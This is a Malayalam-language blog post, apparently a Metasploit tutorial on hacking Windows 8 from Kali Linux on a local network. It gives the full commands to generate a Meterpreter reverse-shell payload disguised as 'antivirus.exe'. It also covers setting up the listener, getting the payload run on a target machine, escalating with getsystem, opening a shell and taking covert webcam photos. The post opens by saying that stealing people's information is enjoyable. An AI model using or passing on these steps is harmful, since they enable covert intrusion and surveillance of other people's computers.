Showing posts with label Metasploit Tutorail. Show all posts

ഹാക്കിംഗ് വിന്‍ഡോസ്‌ 8

ഹാക്കിംഗ് എന്നാല്‍ ഒരു കലയാണ് എന്ന് പറയുന്നതിനേക്കാള്‍ നല്ലത് ഹാക്കിംഗ് അത് ഒരു സംഭവമാണ് എന്നാണ്. എല്ലാവര്ക്കും ഇഷ്ട്ടമാണ് ഒരാളുടെ വിവരങ്ങള്‍ ചോര്‍ത്തുക എന്നത്. അയാള്‍ അറിയാതെ തന്നെ അയാളുടെ സ്വകാര്യ വിവരങ്ങള്‍ ചോര്‍ത്തുക എന്നത് ഒരു നല്ലകാര്യമല്ല എന്ന് എല്ലാവര്‍ക്കും അറിയാം എന്നാല്‍ ഇന്നത്തെ സമുഹത്തില്‍ എല്ലാ രാജ്യങ്ങളും ഓരോ വ്ക്തിയുടെ വിവരങ്ങള്‍ ചോര്‍ത്തുന്നു എന്ന് പറഞ്ഞാല്‍ നിങ്ങള്‍ വിശ്വസിക്കണം . സത്യം അതാണ് ഇന്ത്യ, അമേരിക്ക,റഷ്യ,ചൈനാ, ഇവരൊക്കെയാണ് ഈ ചാരപണി നടത്തുന്ന കൂട്ടത്തില്‍ ഉള്ളവര്‍.
ഇന്ത്യന്‍ സര്‍ക്കാരിന് നിങ്ങളുടെ 'ജിമെയില്‍' വായിക്കണം എന്നാ വാര്‍ത്ത‍ ഒന്ന് വായിക്കുക.
ഇനി നമുക്ക് കാര്യത്തിലേക്ക് കടക്കാം എങ്ങനെയാണ്  ഒരു ഹാക്കര്‍ നിങ്ങളുടെ കമ്പ്യൂട്ടര്‍ ഹാക്ക് ചെയുന്നത് അതിനായി ഞാന്‍ ഇവിടെ എന്‍റെ ഹാക്കിംഗ് ലാബില്‍ കുറച്ചു സിസ്റ്റം സെറ്റ് ചെയ്തു വെച്ചിട്ടുണ്ട് ഇവിടെ എന്‍റെ ഹാക്കിംഗ് ലാബില്‍ 2 സിസ്റ്റം ഉപയോഗിക്കുന്നണ്ട്
  1. Kali Linux
  1. Windows 8
പിന്നെ ഒരു നെറ്റ്‌വര്‍ക്ക് ഉണ്ട് 192.168.1.1 ആണ് നെറ്റ്‌വര്‍ക്ക് ഈ നെറ്റ്‌വര്‍ക്കിലാണ് ഈ രണ്ട് സിസ്റ്റം വര്‍ക്ക്‌ ചെയ്യുന്നത് (Local Network)
ആയതു കൊണ്ട് ഈ സിസ്റ്റം ip addressകള്‍ ഒരേപോലെ ആകും.
  1. Kali Linux 192.168.1.7  കാളി ലിനക്സില്‍ ഐ.പി അറിയല്‍  ടെര്‍മിനല്‍  ifconfig ടൈപ്പ് ചെയ്യുക.
  1. Windows 8 192.168.1.3
കണ്ടില്ലേ ഐ.പി കള്‍ ഇനി നമുക്ക് പണി തുടങ്ങാം.
ഞാന്‍ കാളി ലിനക്സ്‌ ആണ് വിന്‍ഡോസ്‌ 8 ഹാക്ക് ചെയ്യാന്‍ ഉപയോഗിക്കുന്ന സിസ്റ്റം.

ആദ്യമായി ഞാന്‍ കാളിയില്‍ ടെര്‍മിനല്‍ ഓപ്പണ്‍ ചെയ്യുന്നു


ഇനി ടെര്‍മിനല്‍  ഇങ്ങനെ ടൈപ്പ് ചെയ്യുക.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 X > Desktop/antivirus.exe

ഇതില്‍ 192.168.1.7 എന്നത് നിങ്ങളുടെ കാളി ലിനക്സ്‌ന്‍റെ ഐ.പി  ആണ്

ഇപ്പോള്‍ നിങ്ങളുടെ ഡെസ്ക്ടോപ്പില്‍  antivirus.exe എന്നൊരു ഫയല്‍ നിര്‍മിക്കപ്പെട്ടുഉണ്ടാകും അത് ഒരു പെന്‍ഡ്രൈവ് ലേക്ക് കോപ്പി ചെയ്യുക. എനിട്റ്റ് ഹാക്ക് ചെയ്യാന്‍ ഉദ്ദേശിക്കുന്ന കമ്പ്യൂട്ടര്‍ കൊണ്ടുപോയി റണ്‍ ചെയ്യുക. അതിനു മുന്പ് കുറച്ചു പണിയുണ്ട്.ഞാന്‍ ഹാക്ക് ചെയ്യാന്‍ ഉദ്ദേശിക്കുന്ന കമ്പ്യൂട്ടര്‍ എന്‍റെ ലാബില്‍ ഉള്ള ഒരു വിന്‍ഡോസ്‌ 8 ആണ്. ഞാന്‍ വീണ്ടും കാളി ടെര്‍മിനല്‍ലേക്ക് വരുന്നു ഇനി ബാക്കി പണി കൂടി ചെയ്യണ്ടേ..?
ടെര്‍മിനല്‍
msfconsole
  ഇങ്ങനെ ടൈപ്പ് ചെയ്തു അഞ്ചു സെകന്റ് നുള്ളില്‍ ഇങ്ങനെ metasploit തുറന്നു വരും.


അതില്‍ താഴെയുള്ള കമാന്‍ഡ് ടൈപ്പ് ചെയ്യുക. ഒപ്പം ഓരോ കമാന്‍ഡ് കഴിഞ്ഞാല്‍ എന്റര്‍ കീ അമര്‍ത്തുക.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp


set lhost 192.168.1.7


exploit -j -z




antivirus.exe എന്ന ഫയല്‍ കോപ്പി ചെയ്ത  ആ  പെന്‍ഡ്രൈവ് ഞാന്‍ എന്‍റെ വിന്‍ഡോസ്‌ 8 കൊണ്ട് പോയി  antivirus.exe എന്നാ ഫയല്‍ റണ്‍ ചെയ്യുന്നു.



ഈ  antivirus.exe എന്ന ഫയല്‍ റണ്‍ ആയ ഉടന്‍ തന്നെ നിങ്ങളുടെ കാളി ടെര്‍മിനല്‍ ഇങ്ങനെ ഒരു സെഷന്‍ ഉണ്ടകും.




അതിന്‍റെ അര്‍ഥം വിന്‍ഡോസ്‌ 8 ന്‍റെ വെടികെട്ടിനു തിരി കൊളുത്തി എന്നാണ്.
ഇനി തുടങ്ങാം അല്ലെ. വെടികെട്ട്
antivirus.exe റണ്‍ ചെയ്യുന്ന കമ്പ്യൂട്ടറില്‍ നിന്നും വരുന്ന സെഷന്‍ ഇവിടെ കാണാന്‍ സാധിക്കും. അത് സെലക്ട്‌ ചെയ്യാന്‍ വേണ്ടിട്ടു
sessions -l
 കമാന്‍ഡ് ടൈപ്പ് ചെയ്യുക, എന്റര്‍ കീ പ്രസ്‌ ചെയ്യുക.



ഇനി ഈ സെഷന്‍ വെച്ചാണ്‌ നമ്മള്‍ കളികേണ്ടത്
താഴെ കാണിക്കുന്ന കോഡ്കള്‍ ടൈപ്പ് ചെയ്ത് പോകുക ഓരോന്ന് ടൈപ്പ് ചെയ്ത് എന്റര്‍ കീ പ്രസ്‌ ചെയ്യാന്‍ മറക്കരുത്.

sessions -i 1

getsystem


shell


ps




ഇതില്‍ ps എന്ന കമാന്‍ഡ് വിന്‍ഡോസ്‌ 8 ന്‍റെ പ്രോസെസ്സ് കാണിച്ചു  തരും. ഇനി നമുക്ക് എന്‍റെ വിന്‍ഡോസ്‌ റണ്‍ ചെയ്യുന്ന ലാപ്ടോപ്ന്‍റെ ക്യാമറ ഹാക്ക് ചെയ്ത് എന്‍റെ ഫോട്ടോ എടുക്കാം..?
അതിനായി

webcam_snap

 കമാന്‍ഡ് ഉപയോഗിക്കുക.  കണ്ടില്ലേ ഒരു പാവം ചെക്കന്‍റെ വിന്‍ഡോസ്‌ 8 ഹാക്ക് ചെയ്ത് അവന്‍റെ ഫോട്ടോ എടുത്തത്



കൂടുതല്‍ ഹാക്കിംഗ് ടുടോറിയലുമായി  ഇനിയും ഞാന്‍ തിരിച്ചു വരാം..
BajpanGosh Logout......